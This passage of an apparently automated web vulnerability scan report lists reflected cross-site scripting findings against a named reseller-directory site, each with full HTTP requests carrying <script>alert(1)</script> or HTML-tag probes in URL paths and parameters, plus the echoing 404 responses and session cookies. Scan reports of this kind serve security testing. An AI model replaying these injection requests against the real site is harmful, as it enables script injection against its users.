<p>The requested URL /detail/5/themesb225d<script>alert(1)</script>00b6de66bcb/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3449. http://www.resellerbase.com/detail/5/themes/kosmos/search.php [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/5/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 43b43<script>alert(1)</script>a62f7b8679d was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/5/themes/kosmos43b43<script>alert(1)</script>a62f7b8679d/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/5/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:06:04 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/5/themes/kosmos43b43<script>alert(1)</script>a62f7b8679d/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3450. http://www.resellerbase.com/detail/5/themes/kosmos/search.php [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/5/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload f60b3<script>alert(1)</script>83f59bd0f93 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/5/themes/kosmos/search.phpf60b3<script>alert(1)</script>83f59bd0f93?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/5/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:06:19 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/5/themes/kosmos/search.phpf60b3<script>alert(1)</script>83f59bd0f93?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3451. http://www.resellerbase.com/detail/5/themes/kosmos/search.php [Submit3 parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/5/themes/kosmos/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload 4da86<a>b14191ee053 was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/5/themes/kosmos/search.php?keyword=search...&Submit3=Search4da86<a>b14191ee053&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/5/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:03:27 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/5/themes/kosmos/search.php?keyword=search...&Submit3=Search4da86<a>b14191ee053&opt=2 was not found on this server.</p>
...[SNIP]...

2.3452. http://www.resellerbase.com/detail/5/themes/kosmos/search.php [keyword parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/5/themes/kosmos/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload 7770d<a>e1fc914f70d was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/5/themes/kosmos/search.php?keyword=search...7770d<a>e1fc914f70d&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/5/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:03:09 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/5/themes/kosmos/search.php?keyword=search...7770d<a>e1fc914f70d&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3453. http://www.resellerbase.com/detail/5/themes/kosmos/search.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/5/themes/kosmos/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 43577<script>alert(1)</script>62b03df77e8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/5/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2&43577<script>alert(1)</script>62b03df77e8=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/5/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:04:48 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/5/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2&43577<script>alert(1)</script>62b03df77e8=1 was not found on this server.</p>
...[SNIP]...

2.3454. http://www.resellerbase.com/detail/5/themes/kosmos/search.php [opt parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/5/themes/kosmos/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload d433f<a>e327faffbb2 was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/5/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2d433f<a>e327faffbb2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/5/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:03:42 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/5/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2d433f<a>e327faffbb2 was not found on this server.</p>
...[SNIP]...

2.3455. http://www.resellerbase.com/detail/5/themes/search.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/5/themes/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload adda1<script>alert(1)</script>1f5ec8079cd was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detailadda1<script>alert(1)</script>1f5ec8079cd/5/themes/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/5/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:05:32 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detailadda1<script>alert(1)</script>1f5ec8079cd/5/themes/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3456. http://www.resellerbase.com/detail/5/themes/search.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/5/themes/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 860ad<script>alert(1)</script>b234bbfe6a6 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/5860ad<script>alert(1)</script>b234bbfe6a6/themes/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/5/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:05:48 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/5860ad<script>alert(1)</script>b234bbfe6a6/themes/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3457. http://www.resellerbase.com/detail/5/themes/search.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/5/themes/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 1126e<script>alert(1)</script>3d62e29c64d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/5/themes1126e<script>alert(1)</script>3d62e29c64d/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/5/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:05:59 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/5/themes1126e<script>alert(1)</script>3d62e29c64d/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3458. http://www.resellerbase.com/detail/5/themes/search.php [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/5/themes/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 60ef8<script>alert(1)</script>d9f63b09d1e was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/5/themes/search.php60ef8<script>alert(1)</script>d9f63b09d1e?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/5/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:06:17 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/5/themes/search.php60ef8<script>alert(1)</script>d9f63b09d1e?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3459. http://www.resellerbase.com/detail/5/themes/search.php [Submit3 parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/5/themes/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload 929e2<a>35e811e03f5 was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/5/themes/search.php?keyword=search...&Submit3=Search929e2<a>35e811e03f5&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/5/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:03:36 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/5/themes/search.php?keyword=search...&Submit3=Search929e2<a>35e811e03f5&opt=2 was not found on this server.</p>
...[SNIP]...

2.3460. http://www.resellerbase.com/detail/5/themes/search.php [keyword parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/5/themes/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload 552d4<a>9b19d41fa6f was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/5/themes/search.php?keyword=search...552d4<a>9b19d41fa6f&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/5/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:03:21 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/5/themes/search.php?keyword=search...552d4<a>9b19d41fa6f&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3461. http://www.resellerbase.com/detail/5/themes/search.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/5/themes/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload d0ff5<script>alert(1)</script>88b717e9274 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/5/themes/search.php?keyword=search...&Submit3=Search&opt=2&d0ff5<script>alert(1)</script>88b717e9274=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/5/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:05:05 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/5/themes/search.php?keyword=search...&Submit3=Search&opt=2&d0ff5<script>alert(1)</script>88b717e9274=1 was not found on this server.</p>
...[SNIP]...

2.3462. http://www.resellerbase.com/detail/5/themes/search.php [opt parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/5/themes/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload 9b5af<a>e39467ac77 was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/5/themes/search.php?keyword=search...&Submit3=Search&opt=29b5af<a>e39467ac77 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/5/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:03:55 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/5/themes/search.php?keyword=search...&Submit3=Search&opt=29b5af<a>e39467ac77 was not found on this server.</p>
...[SNIP]...

2.3463. http://www.resellerbase.com/detail/6/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/6/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload ff3d5<script>alert(1)</script>4149193c459 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detailff3d5<script>alert(1)</script>4149193c459/6/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:02:21 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detailff3d5<script>alert(1)</script>4149193c459/6/ was not found on this server.</p>
...[SNIP]...

2.3464. http://www.resellerbase.com/detail/6/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/6/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 73336<script>alert(1)</script>a71fe45a589 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/673336<script>alert(1)</script>a71fe45a589/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:02:35 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/673336<script>alert(1)</script>a71fe45a589/ was not found on this server.</p>
...[SNIP]...

2.3465. http://www.resellerbase.com/detail/6/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/6/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 6b32f<script>alert(1)</script>b027f6045b5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/6/?6b32f<script>alert(1)</script>b027f6045b5=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:02:03 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/6/?6b32f<script>alert(1)</script>b027f6045b5=1 was not found on this server.</p>
...[SNIP]...

2.3466. http://www.resellerbase.com/detail/6/rating.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/6/rating.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 53f2c<script>alert(1)</script>8a611919bf829cfaa was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /detail53f2c<script>alert(1)</script>8a611919bf829cfaa/6/rating.php?id=6&rating=5 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/6/whitelabeldropshipper-com.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:04:18 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail53f2c<script>alert(1)</script>8a611919bf829cfaa/6/rating.php?id=6&rating=5 was not found on this server.</p>
...[SNIP]...

2.3467. http://www.resellerbase.com/detail/6/rating.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/6/rating.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 897f3<script>alert(1)</script>d6d3e1ac4e6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail897f3<script>alert(1)</script>d6d3e1ac4e6/6/rating.php HTTP/1.1
